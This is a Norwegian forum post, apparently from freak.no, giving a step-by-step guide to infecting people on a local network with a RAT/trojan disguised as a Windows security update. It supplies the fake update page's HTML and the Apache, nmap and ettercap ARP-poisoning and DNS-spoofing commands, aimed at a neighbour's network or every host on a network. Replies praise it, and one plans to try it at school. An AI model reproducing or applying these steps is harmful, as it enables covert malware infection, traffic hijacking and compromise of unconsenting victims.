Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  2 1881
Hei!

Har sett en del tråder her inne ved bruk av backtrack. Slik jeg ser det her, så blir det ofte nevnt "Cracking av WEP/WPA" "Reaver" og småting som "hvordan bli administrator på skolepc via backtrack"

Nå skal jeg starte med å lage en guide som du faktisk kan lure folk på lan, hjemme hos deg selv, eller naboen din, ved at de laster ned ned en fake notifikasjon som egentlig er infisert med en trojan aka RAT. Akkurat dette skal vi komme tilbake til.

Først og fremst sørg for at du har lastet ned backtrack. Kan lastes ned her: http://www.backtrack-linux.org/downloads/

Nå som du har lastet ned backtrack, så brenner du det på DVD-plate, eller på minnepenn(USB). Ved brenning kan det brukes hvilken som helst brenneprogram, som f.eks Ultraiso, magiciso osv.. For de med minnepenn sjekk ut unetbootin søkes lett på google første treff, og last ned. Man kan gjerne bruke VMware til dette også.

Boot så deretter backtrack via DVD, Minnepenn, eller via VMware. Sørg for at din datamaskin tillater booting akkurat dette i BIOS.

Nå som du er inne i systemet, åpne filmappe, og se etter

Kode

/var/www/
Der skal det være en fil som heter index.html. Åpne det med hvilken som helst tekstredigeringsverktøy anbefaler kate. Slett alt som er i index.html, og kopier dette.

Kode

<body>
<p align="center" class="style2">Kritisk Sikkerhetsproblem i Windows XP, Vista, Windows 7 oppdaget. Nedlasting og installasjon av oppgradering kreves. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Last ned oppdatering" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
</p><p align="center" class="style2"></p>
<p>&nbsp;</p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4">&nbsp;</p>
Nå som du har mekket deg RAT/trojan endre navn til windowsupdate.exe, eller hva du selv vil kalle den for. Du må i tillegg endre der det står windowsupdate.exe om du har gitt det et annet navn. Man kan selvfølgelig redigere innholdet, og kanskje pynte den litt slik at den ser litt mer legit ut med bilder eller akkurat fra Microsoft's egen oppdaterings side http://www.update.microsoft.com/micr....aspx?ln=en-us.

Kopier dette til der du har index.html.

Start apache via terminalen

Kode

/etc/init.d/apache2 start
Åpne firefox, og naviger til 127.0.0.1, og din fake oppdatering side vil dukke opp.

Nå sett opp dns_spoofing konfigurasjon

Kode

echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns
Skift 192.168.1.101 til ditt eget IP-adresse, hint: (ifconfig)

Ved å offeret's IP-adresse skriver du følgende på terminalen

Kode

nmap -sP your_subnet/24
Nå skal vi bruke ARP poison med ettercap ved bruk av dns_spoof plugin

Kode

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
http://en.wikipedia.org/wiki/ARP_spoofing

Erstatt 192.168.1.102 med offeret's IP-adresse
Erstatt 192.168.1.1 med ditt eget gateway ip
Erstatt wlan0 med ditt monitor mode, som f.eks mon0 osv..

Hvis du vil angripe alle i nettverket kan du skrive dette på terminalen

Kode

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof
Når noen av ofrene prøver å navigere til en nettside eks. vg.no facebook.com vil de bli omdirigert til en fake oppdatering side som du nettopp har laget. Noen vil være mistenksomme, men etter 5 min vil de ikke kunne gjøre noe på nettverket annet enn å laste ned RAT, men noen vil gi faen, og gjøre alt for å sikre pcen mot oppdateringer og laster ned viruset.

Til slutt når du føler at du har lyst til å avslutte selve prosessen skriver du

Kode

ipconfig /flushdns
Alt vil da være tilbake til normalt igjen. Vil minne dere om at dette var min første guide på nFF

Husk at alt dette brukes på eget ansvar.

- Zirto
Sist endret av Zirto; 26. april 2012 kl. 00:01.
Grei og ryddig tut.
I failed unit tests
Freddy_fred5's Avatar
Meget bra! Dette skal testes! (på hjemmemaskiner såklart, kanskje en liten snartur innom skolen etterpå, passer perfekt at en av de med administrator tillatelse har glemt passordet på standardbruker så han bruker admin brukern som standard :3 )